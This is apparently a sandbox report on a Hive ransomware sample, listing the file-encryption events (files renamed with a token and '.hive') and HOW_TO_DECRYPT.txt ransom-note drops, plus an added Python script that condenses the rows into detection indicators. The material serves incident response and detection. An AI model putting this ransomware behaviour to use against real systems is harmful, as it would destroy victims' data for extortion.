| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailSplashLogo.scale-250.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filter-hover_32.svg | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CASCADE\PREVIEW.GIF.P7EsMTWem2f4DapaPblE9BlnkxlS9YQllD3nUpaK9Eo.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\resources.pak.DATA.P7EsMTWem2f4DapaPblE9PSmXvAta_JqUP56tyeEGTo.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AlarmsMedTile.contrast-black_scale-125.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Microsoft.Applications.Telemetry.Windows.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\OutlookMailSmallTile.scale-150.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Security.SecureString.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MSIPC\sv\msipc.dll.mui.P7EsMTWem2f4DapaPblE9AuHrQaaDXlDVGqGIllTijo.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSGet.Format.ps1xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\nl_get.svg | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\api-ms-win-core-namedpipe-l1-1-0.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_wasapi_plugin.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxManifest.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ar-ae\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\MondoR_ViewOnly_ZeroGrace-ul-oob.xrm-ms | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\Fonts\private\GADUGIB.TTF.P7EsMTWem2f4DapaPblE9N9WkJwDaKIFhphO3V9SeQ4.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-crt-runtime-l1-1-0.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-64_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl64.DllA\OpenSSL64.DllA\zlibwapi.dll.P7EsMTWem2f4DapaPblE9FAK8e5LuWsFN3tP-2Rk0wc.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\ro.pak.P7EsMTWem2f4DapaPblE9OxFCp75q308UWmFVzVcogg.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\Assets\NewNotePlaceholder-dark.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\es-es\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365BusinessR_Subscription-ppd.xrm-ms.P7EsMTWem2f4DapaPblE9Iug6pFcybIlgFi-LU92Yhw.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\System.Runtime.InteropServices.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\css\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sl-sl\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailLargeTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\rsod\proofing.msi.16.en-us.tree.dat.P7EsMTWem2f4DapaPblE9PELDBezftc1xes91Op6jBs.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-right.gif.P7EsMTWem2f4DapaPblE9IPXwRs6EwMqDK5EsTxwVUA.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ja-jp\ui-strings.js.P7EsMTWem2f4DapaPblE9CEvoU-M2td-iXWpVvrfvGg.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\en-US\PackageManagementDscUtilities.strings.psd1.P7EsMTWem2f4DapaPblE9PZJe1ZgBUwtbzbv8rzUuBc.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Microsoft.Msn.Controls\EndOfLife\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteWideTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_hover_18.svg | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\faf_field_grabber.png.P7EsMTWem2f4DapaPblE9O_MlC_RsF44NXcIPKcbIwc.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base_heb.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteNewNoteSmallTile.scale-150.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\IC_WelcomeBanner.scale-100.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Text.Encodings.Web.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\decora_sse.dll.P7EsMTWem2f4DapaPblE9PD0BmXDN7JX9keKpkGeX1o.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-30_altform-unplated_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\MEIPreload\preloaded_data.pb.DATA.P7EsMTWem2f4DapaPblE9Ou3jzKHGGsk_4I_XnnhIEA.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_PrepidBypass-ppd.xrm-ms | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD_COL.HXC | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_PigNose.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.147.37\msedgeupdateres_ur.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\zh-Hans\PresentationFramework.resources.dll.P7EsMTWem2f4DapaPblE9DGMyl3gAfgbESWq6F7fSiQ.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\da-dk\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\prism_common.dll.P7EsMTWem2f4DapaPblE9HXDaPkZ-gZv9DM0I8sk2xE.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.Preview.winmd | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
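The rows above are raw sandbox events, and the useful indicators (ransom-note filename, the appended extension, the fixed part of the token the sample inserts before `.hive`, which directory trees were touched) are buried in thousands of them. The following Python script is an added example, not part of the sandbox report or of any Hive tooling: it parses rows in the pipe-delimited format used on this page and condenses them into hunt-ready IOCs. The six sample rows embedded in it are copied verbatim from this report; the `ENCRYPTED_NAME_RE` pattern (original name, a dot, 43 base64url characters, `.hive`) is inferred from the names shown in this report and is an assumption about this sample only, and all function names are my own. The script only labels each event; this section records open and create events, so it does not try to reconstruct the encrypt-then-rename sequence from them.

```python
import base64
import os
import re
from collections import Counter
from pathlib import PureWindowsPath

# Rows copied verbatim from the sandbox report above (sample Hive_17_07_2021_808KB.exe).
REPORT_ROWS = r"""
| File created | C:\Windows\System32\spp\tokens\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_MAK_AE-ul-phn.xrm-ms.P7EsMTWem2f4DapaPblE9JLMqb0GT-MsqSXfDBplsgc.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\api-ms-win-core-namedpipe-l1-1-0.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ko\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\faf_field_grabber.png.P7EsMTWem2f4DapaPblE9O_MlC_RsF44NXcIPKcbIwc.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\resources.pak.DATA.P7EsMTWem2f4DapaPblE9PSmXvAta_JqUP56tyeEGTo.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
"""

# Assumption inferred from this report: encrypted names are <original>.<43 base64url chars>.hive
ENCRYPTED_NAME_RE = re.compile(r"^(?P<original>.+)\.(?P<token>[A-Za-z0-9_-]{43})\.hive$")
RANSOM_NOTE = "HOW_TO_DECRYPT.txt"


def parse_rows(text):
    """Turn the report's pipe-delimited rows into dicts; header and blank lines are skipped."""
    events = []
    for line in text.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 4 or cells[0] == "Description":
            continue
        events.append(dict(zip(("description", "indicator", "process", "target"), cells)))
    return events


def classify(event):
    """Label one event: ransom-note drop, access to an encrypted name, or access to an original name."""
    name = PureWindowsPath(event["indicator"]).name
    if name == RANSOM_NOTE:
        return "ransom_note", None
    m = ENCRYPTED_NAME_RE.match(name)
    if m:
        return "encrypted_name", m.group("token")
    return "original_name", None


def decode_token(token):
    """base64url-decode the 43-character token; a single '=' restores 4-character alignment."""
    return base64.urlsafe_b64decode(token + "=")


def triage(text):
    """Condense the rows into the indicators a responder would hunt with."""
    events = parse_rows(text)
    counts = Counter()
    tokens, roots = [], set()
    for ev in events:
        kind, token = classify(ev)
        counts[kind] += 1
        if token:
            tokens.append(token)
        roots.add(PureWindowsPath(ev["indicator"]).parts[1])  # e.g. 'Program Files'
    return {
        "process": {ev["process"] for ev in events},
        "counts": dict(counts),
        "ransom_note": RANSOM_NOTE,
        "extension": ".hive",
        # Part of the token that every encrypted name in the input shares.
        "token_prefix": os.path.commonprefix(tokens) if tokens else "",
        # Decoded token length in bytes (43 unpadded base64url characters hold 32 bytes).
        "token_bytes": {len(decode_token(t)) for t in tokens},
        "roots": sorted(roots),
    }


if __name__ == "__main__":
    for key, value in triage(REPORT_ROWS).items():
        print(f"{key}: {value}")
```

Feed the whole report's rows in and the output gives a single note name, a single extension, the common token prefix (`P7EsMTWem2f4DapaPblE9` for the rows on this page), and the list of directory roots the sample walked; the regex and the prefix are what you would put into a filename-based EDR or Sigma rule for this sample, while the note name and `.hive` suffix are the broader Hive indicators. Treat the prefix as sample-specific: it is derived from the names in this report, not documented behaviour of the family.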
Drops file in Windows directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-d..lowbroker.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_521d56dcb4ef479b\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-hlink_31bf3856ad364e35_10.0.19041.1237_none_d6d991394db08f86\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-m..ac-ado-ddl-security_31bf3856ad364e35_10.0.19041.264_none_9a64e210d3a49e6c\r\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-dafwfdprovider_31bf3856ad364e35_10.0.19041.1_none_b058c457605b2980\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-k..l-pnp-adm.resources_31bf3856ad364e35_10.0.19041.1_it-it_e961f8e21ea93e0a\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-m..mentmanifests-shell_31bf3856ad364e35_10.0.19041.423_none_9e37e96dfd85e9b1\r\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-mapcontrol-desktop_31bf3856ad364e35_10.0.19041.746_none_2999d52b8db06219\f\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_windows-id-connecte..nt-provider-activex_31bf3856ad364e35_10.0.19041.1_none_211e6839b16031fe\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-n..rity-domain-clients_31bf3856ad364e35_10.0.19041.1_none_db2033aec5f4055d\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-i..l-keyboard-0000044b_31bf3856ad364e35_10.0.19041.1_none_b2edb67cf59d8460\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-ie-setup.resources_31bf3856ad364e35_11.0.19041.1_uk-ua_651962b808b5b764\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-certutil.resources_31bf3856ad364e35_10.0.19041.1_es-es_85df3743bdb65309\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-explorer.resources_31bf3856ad364e35_10.0.19041.1023_en-us_7aca3dab28c636fc\f\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\x86_system.printing_31bf3856ad364e35_10.0.19041.1_none_cd12d4bd5d1c62ec\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-mdm-adm_31bf3856ad364e35_10.0.19041.1_none_afd04b8235cdb4f2\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\assembly\GAC_MSIL\System.ServiceModel.Resources\3.0.0.0_it_b77a5c561934e089\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_hyperv-commandline-tool_31bf3856ad364e35_10.0.19041.928_none_0b17415ae0dd0379\r\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\x86_microsoft-windows-i..o4-codecs.resources_31bf3856ad364e35_10.0.19041.1_en-us_57d193173da3f87b\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-onecore-c..clientapi.resources_31bf3856ad364e35_10.0.19041.1_de-de_9b306a53cd56cfa2\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-devices-wifidirect_31bf3856ad364e35_10.0.19041.264_none_7507f2201fb551a4\r\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\msil_system.serviceprocess.resources_b03f5f7f11d50a3a_10.0.19041.1_it-it_ae68d65583e97eab\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\msil_microsoft.powershell.security.resources_31bf3856ad364e35_1.0.0.0_ja-jp_81063264f1136d5e\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_windows-media-speech-winrt_31bf3856ad364e35_10.0.19041.264_none_fbb15bbadd313556\r\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-b..roxy-main.resources_31bf3856ad364e35_10.0.19041.1_en-us_3813956db567ed0e\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-d..agement-omadmclient_31bf3856ad364e35_10.0.19041.1151_none_c86feb6936a97173\r\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\WsatConfig.resources\v4.0_4.0.0.0_es_b03f5f7f11d50a3a\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-n..pprovider.resources_31bf3856ad364e35_10.0.19041.1_es-es_41e0d1946a7c5321\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\msil_system.messaging.resources_b03f5f7f11d50a3a_10.0.19041.1_de-de_917d3b2b93fb8e53\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Utilities.Resources\2.0.0.0_ja_b03f5f7f11d50a3a\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\wow64_microsoft-windows-payments_31bf3856ad364e35_10.0.19041.746_none_3c6d03c57404e0f9\f\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-directui.resources_31bf3856ad364e35_10.0.19041.1023_pt-br_e4a05bc207bb3d6f\r\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\x86_microsoft-windows-mediaplayer-wmvcore_31bf3856ad364e35_10.0.19041.1202_none_1fd41533d2b067a4\f\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-b..2provider.resources_31bf3856ad364e35_10.0.19041.1_uk-ua_02970791e1e5a4d5\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\WinSxS\amd64_microsoft-windows-d..airingdll.resources_31bf3856ad364e35_10.0.19041.1_ja-jp_a49ef473cdccb95c\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
